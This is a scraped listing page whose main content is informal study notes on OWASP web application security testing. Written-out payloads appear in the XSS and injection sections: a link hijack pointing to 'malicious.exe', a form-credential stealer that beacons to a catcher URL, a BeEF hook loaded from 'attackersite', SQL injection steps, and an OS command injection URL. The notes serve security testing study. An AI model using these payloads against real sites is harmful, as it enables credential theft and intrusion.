Todo lo relacionado con OWASP, Proyecto Libre de Seguridad de Aplicaciones WebDescripción completa
The10 Most Critical Web Application Security VulnerabilitiesDescripción completa
only manual testing notes......
Software development Life cycle,waterfall model,spiral model.. verification validation hybrid model agile model, types of testing , STLC, writing test cases
Full description
Lecture Notes for Topic 9
Software Testing Notes
Word Document - used for study for PCN Level 2Descripción completa
Full description
Informe completo de las vulnerabilidades o riesgos que nuestros sistemas o aplicaciones web pueden tener por no tener una implementación de seguridad robusta especificada por OWASP TOP 10 20…Descripción completa
Tests phpunit with codeignierDescripción completa
Pilot Aptitude Testing GuideDescripción completa
CONCRETE
testingFull description
Descrição completa
Battery testing guideFull description
How to test battery
Full description
Field Density Testing GuideFull description
ICT QA at YarraFull description
consist of manual testing processes and modelsFull description
consist of manual testing processes and models
consist of manual testing processes and modelsFull description
USING TESTING GUIDE: GO TO PG:47 look fr the control and Ctrl+f the Ref number Owasp Testing Methodology: Before Development: 1.Policy review 2.standards review Defenition and Design 1.Requ revi 2.Design and uml models reviw 3.Arcitecture review 4.Create and review the threrat models Development 1.Code walkthroughs 2.Code review and 3.Unit and sys test Maintenance 1.Change Verification 2.Health Checks 3.Operational mgmt review 4.Regression tests Two modes : 1.Passive 2.Active - Under active we have all the below tests We have split the set of active tests in 9 sub-categories for a total of 66 cont rols: Configuration Management Testing Business Logic Testing Authentication Testing Authorization testing Session Management Testing Data Validation Testing Denial of Service Testing Web Services Testing Ajax Testing For the above tests we use specific tools . Black box testing: Analyze robots.txt using Google Webmaster Tools iste site:____ and intest____ to identify sites n resources cache:______ gives the chached version of the site Grey Box: Analyze entry points Look into the post and get methods used Use fiddler fr analysing the requests
SQL INJECTION: Three types Inband out of band inferential Steps: 1.Adding a semi colon or single quote
2.If we get a normal 500 server erroe that means blind sql is in order 3.Check each field seperately 4.Check for comment out specification 5.Try changing paranthesis specifications 6.Some query checks if only one tuple is returned fr that use LIMIT 1 end of the payload 7.use %20 fr all spaces 8.Try using order by and getting the number of columns 9.Then try union all 10. For blind use SUBSTRING (text, start, length) , ASCII (char) and LENGTH (tex t) 11.LOAD FILE to add file contents to the SQL query XSS: From the response find the script in use either it'll be JavaScript , ActionScript and VBScript. use CAL9000 to find out type of encoding like %3cscript%3e Script to dwonload malicios .exe file <script>window.onload = function() {var AllLinks=document.getElementsByTagName("a"); AllLinks[0].href = "http://badexample.com/malicious.exe"; } use for REDIRECTION : <script>alert(document.cookie) use window.location="www.1.com" window.navigation(""); FOR Phishing use: <script>function hack(){ alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.forms[0].user.value + "Password = " + document.forms[0].pass.value); XSSImage=new Image; XSSImage.src="http://localho st/WebGoat/catcher?PROPERTY=yes&user="+ document.forms[0].user.value + "&passwor d=" + document.forms[0].pass.value + "";} < br> Log Spoofing: Smith%0d%0aLogin Succeeded for username: admin XSS browser exploitation framework (BeEF) <script src=http://attackersite/beef/hook/beefmagic.js.php> HTTP ONLY attribute in session adds to the security HTTP POST request for file upload: POST /fileupload.aspx HTTP/1.1 [] Content-Disposition: form-data; name="uploadfile1"; filename="C:\Documents and Settings\test\Desktop\test.txt" Content-Type: text/plain test HTTP POST Request forged: Content-Disposition: form-data; name="uploadfile1"; filename="C:\Documents and Settings\test\Desktop\test.gif" Content-Type: text/html <script>alert(document.cookie)
some special variables and functions to look at when analyzing source code: FOR PHP: $_GET - HTTP GET variables $_POST - HTTP POST variables $_FILES - HTTP File Upload variables For ASP Request.QueryString - HTTP GET Request.Form - HTTP POST Server.CreateObject - used to upload files For JSP doGet, doPost servlets HTTP GET and POST request.getParameter - HTTP GET/POST variables SSLtesting: SSL encrpts resp and req . And aso provide digi cert fr authenticating servers n sometime even clients HTTPS can run on non std ports Nessus can report eak ciphers in SSL Check certificates- Domain names might nt match in certificate Infrastructure and Application Admin Interfaces: Use dirbuster and get directories See source code fr links in comment Review Server config to see admin user page n server creds Try alternate server port tamper the GET and Post req Credentials Brute forcing: 3 types: Dictionary Serach Rule based search Brutus can be use to carry out the attacks Bypassing authentication: Direct page request (forced browsing) Parameter Modification Session ID Prediction SQL Injection Testing for logout see if cache has some info see if session is completely gone try going forwad and backward
Testing for race conditions: Concurrency in accounts concurrency in cart etc For sessions: See if sessions are weak see for fixation see for tags like httponly- saves cookie from goin out secure- encrypted tunnel fr sensitive data domain-same origin policy path expires Authorization testing: path traversal using ..// forced browsing test for csrf Testing fro xss: use cal9000 for testing char encoding stored xss can be exploited further with BeEF LDAP injection: check by inserting '(', '|', '&', '*' in the ldapsearch field ORM injection: Objection relational mapping tool is used to map db objects to protect from DOR XML injection: test with adding ' " < > to include the content of a file. The injection can be performed also in HTTP headers GET / HTTP/1.0 Referer: User-Agent: SSI directives: < ! # = / . " - > and [a-zA-Z0-9] Xpath injection: -----OS command injection: Example URL before alteration: http://sensitive/cgi-bin/userData.pl?doc=user1.txt Example URL modified: http://sensitive/cgi-bin/userData.pl?doc=/bin/ls| This will execute the command /bin/ls Use semi colon after that for a .php page In post method as: Authorization: Basic T2Vbc1Q9Z3V2Tc3e=